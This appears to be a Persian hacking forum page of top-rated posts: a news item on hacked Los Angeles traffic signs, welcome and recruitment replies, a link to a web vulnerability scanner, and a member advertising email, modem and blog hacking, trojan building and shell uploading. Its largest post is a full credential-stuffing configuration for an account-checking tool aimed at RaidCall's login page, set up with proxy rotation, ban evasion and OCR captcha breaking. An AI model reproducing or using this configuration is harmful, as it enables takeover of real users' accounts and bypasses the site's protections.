    در تاریخ ۹ ژانویه ۲۰۱۵ , تابلوهای الکترونیکی ترافیک در مرکز لس‌آنجلس توسط یک فرد ناشناس هک شد و برای رانندگان گیرافتاده در ترافیک پیام های مختلفی را به نمایش درآورد. به گزارش آی تی اس ان (پایگاه خبری امنیت فناوری اطلاعات) , بنظر میرسد هرکسی که پشت این ماجرا بوده علاقه زیادی به کتاب و کتاب خوانی داشته و میخواسته مردم را به کنارگذاشتن موبایل , توییتر و … وادار کند چرا که پیام هایی مانند “Read a f–king book” (یک کتاب لعنتی را بخوان!) را در این تبلوها نمایش داده است ! این اتفاق را فردی با نام Daina Solomon با انتشار تصاویر مربوط به هک در توییتر اطلاع رسانی کرد . این ماجرا برای اولین بار نیست که اتفاق می افتد قبلا هم هکرها تابلوهای ترافیک صربستان را با قراردادن تصویری در حمایت از دزدان دریایی خلیج هک کرده بودن. در هر صورت ما اینگونه کارها را تایید نمی کنیم اما بد نیست کمی هم به عقب برگردیم , وسایل هوشمندمان را کنار بگذاریم و با دست گرفتن یک کتاب مانند زمان قدیم‌ها به مطالعه بپردازیم.
  44. 1 امتیاز
    کاربر blackspy شما میتونید فعالیتتون رو در انجمن نفوذ و امنیت شروع کنید تا مورد نظارت قرار بگیره و در صورت رصایت رنکینگ تعلق خواهد گرفت
  45. 1 امتیاز
    با سلام من در بخش رباتیک ، موبایل و مجلات علمی توانایی دارم . لطفا به من راهنمایی هایه لازمه رو بفرمایید تا انجام بدم . 09157879931 A.only1one@gmail.com
  46. 1 امتیاز
    کانفیگ ریدکال برای چک کردن ایدی های ساخته شده و ساخته نشده [Wordlist] UserIndex=1 PassIndex=2 EmailIndex=0 429A15B1299B27EAD2DEF76A94C3B288=1 [Settings] SiteURL=http://www.raidcall.com/user/login Timeout=20 WaitBot=0 ResolveHost=0 ComboFilter=0 ComboMode=0 EmailFilter=0 EmailMode=0 UsernameStart=6 UsernameEnd=8 InvalidChars= AllowedChars= Letters=0 Digits=0 Alpha=0 Email=0 LowerUpper=0 LetterDigit=0 SpeciaChar=0 PasswordStart=6 PasswordEnd=8 PasswordInvalidChars= PasswordAllowedChars= PasswordLetters=0 PasswordDigits=0 PasswordAlpha=0 PasswordEmail=0 PasswordLowerUpper=0 PasswordLetterDigit=0 PasswordSpeciaChar=0 ProxyActivate=10 ProxyRatio=4 ProxyCombo=0 WaitTime=5 BanWindowWidth=1 BanWindowRatio=10 BanWindowProxies=10 blnNoProxies=1 HTTPHeader=<ACTION> <FORM ACTION> <HTTP VERSION>|Accept: */*|User-Agent: <USER AGENT>|Host: <HOST>|Pragma: no-cache|Connection: keep-alive| RequestMethod=2 Referer=0 POSTData=username=<USER>&userpw=<PASS>&validcode=<Captcha>&wp-submit=login&flag=1 [Fake] AfterFP=1 blnSuccess=0 SuccessRetries=3 blnProcessErrors=1 blnCompleteNot=1 EnableConHits=0 ConHits=0 FollowRedirect=1 EnableConLength=0 ConLength=-1 SourceTags=1 UserField=0 HTTPFollow=1 blnForbToOK=1 ForbToOkLength=1000 blnBadOcrCode=0 BadOcrCodeRetries=3 [Keywords] EnableHeaderSuccess=0 EnableHeaderBan=0 EnableHeaderFail=0 EnableHeaderRetry=0 HeaderSuccess= HeaderBan= HeaderFail= HeaderRetry= EnableGlobalSourceRetry=1 EnableSourceSuccess=1 EnableSourceBan=0 EnableSourceFail=1 EnableSourceRetry=1 SourceSuccess=Password error SourceBan= SourceFail=LogOut SourceRetry=CAPTCHA test failed. [Form] IAParse=0 LoginPostData= LoginMethod=1 LoginHeader=0 Action=http://www.raidcall.com/user/login Username=username Password=userpw Email= AddData=wp-submit=login&flag=1 CustomData= NoIndex= Cookie=PHPSESSID=tfv4qu110j7n6uvs7e2n23ghu7 IAction=-1 IUser=-1 IPass=-1 IEmail=-2 ICaptcha=-1 ReqReferer= ReqCookie= AjaxURL= AjaxPOSTData= AjaxData= AjaxParsingCode= RefData= ParsingCode= FormRedirectUrl=http://www.raidcall.com/user/login RedPostData= RedKeys=<Source>||Password error;<Header>||Password error DataDesc=Config By [G]ame_Over CaptureParsingCode=are| |#00|#00|0|#00|#00|0 RefreshSession=0 RefreshCookie=1 FormHeader=0 AjaxHeader=0 RedHeader=0 IAMethod=2 POSTMethod=2 RedMethod=1 ImageAfterAjax=0 blnBasic=0 FollowRedirectsOnIA=0 FollowRedirectsOnRed=1 [Ajax] Variables= PostElements2= RedURL= [OCR] OCRMode=2 URLMode=0 ImageURLID=http://www.raidcall.com/ajax/captcha Captcha=validcode OCRKey= RefreshCaptcha=1 blnContrast=1 blnBrightness=1 blnSaturation=1 blnThreshold=1 blnInvert=0 blnNoise=1 blnIsolate=0 blnResize=0 blnBorder=0 blnCharExtract=0 blnRemoveColors=0 blnStringFilter=1 blnLetter=1 blnDigits=0 blnBlur=0 blnReconstruct=0 blnLower=1 blnUpper=0 blnRemoveLines=1 blnMultiChar=0 blnCharTable=0 blnPalette=0 blnCharResize=0 blnCharSubExtraction=0 blnThreeImages=0 blnGif=0 blnCompute=0 blnBorderPre=0 Contrast=58 Brightness=23 Saturation=15 Threshold=90 Noise=10 Isolate=1 Resize=1 BorderLeft=0 BorderTop=0 BorderRight=0 BorderBottom=0 CharExtractMinBlack=0 CharExtractMaxBlack=1 CharExtractMinWidth=1 CharRotateMax=0 CharRotateSteps=5 MinLength=4 MaxLength=4 BlurRadius=5 CharExtractMaxWidth=33 CharWidthMinBlack=2 CharSpace=1 Range=0 InvertDensity=0 InvertLength=20 LineCurvatureMax=4 LineWidthMax=13 CharResize=1 CharHeight=13 GifStart=2 GifOffset=2 BorderLeftPre=0 BorderTopPre=0 BorderRightPre=0 BorderBottomPre=0 CharBorderH=5 CharBorderV=5 CharRotateBorder=5 CharExtractMinHeight=1 VerticalRejoin=30 CharExclude= SpecialChars= Colors= Colors2= Lines=Min Length: 2, Max Width: 2, Horizzontal Language=cp14
  47. 1 امتیاز
    با سلام خوش امدین فعالیت خودتون رو شروع کنید تا مورد بررسی قرار بگیره موفق باشید
  48. 1 امتیاز
    با عرض سلام و خسته نباشيد حقيقتش من تازه واردم اگه مشكلي نيست من بعد ار اموزش فعاليتم را اغاز ميكنم ممنون ..
  49. 1 امتیاز
    سلام خدمت مدیر کل گرامی C0d3!Nj3ct!0N من چندتا متود هک با کالی ،هک ایمیل،هک مودم و وایرلس،ساخت تروجان وویروس ،هک وبلاگ ،ساخت صفحه دیفنس وهمچنین تسلت برزبان html دارم میشه باسلاح خودتون یک بخش رو بهم بدید و همچنین منو عضو گروه دیفنس کنید ازدیفنس هم سر در میارم یه جورایی و همچنین شل آپلود کردن.... دراصل علاقه اصلی من هک سایت و وبلاگ و دیفنس کردن یا شل آپلود کردن هست ولی آموزش درستی در هیچکدوم از انجمن ها وسایت ها پیدا نکردم برای همین در این زمینه درحدمتوسط هستم لطفا اگه امکان داره منو عضو دیفنس کنیدو همچنین مطمئن باشید که در زمینه های مختلف در انجمن میتوانم فعالیت کنم لطفا نظر خود را برایم ایمیل کنیدیابه صورت شخصی مطرح کنید wolfhacker1998@yahoo.com باتشکر از مدیران سایت
  50. 1 امتیاز
    RT3N

    Mobile website scanner

    خوب اینم یک اسکنر قوی با نام Websecurify مخصوص موبایل این اسکنر در ورژن های مختلفی تهییه شده که قابلیت شناسایی آسیب بذیری های زیر را دارا میباشد Cross site scripting Cross site request forgery Path disclosure Internal errors SQL injection URL redirection HTTP response splitting Local and remote file include Session cookies problem Information disclosure problems دانلود از طریق Google Code : https://code.google.com/p/websecurify/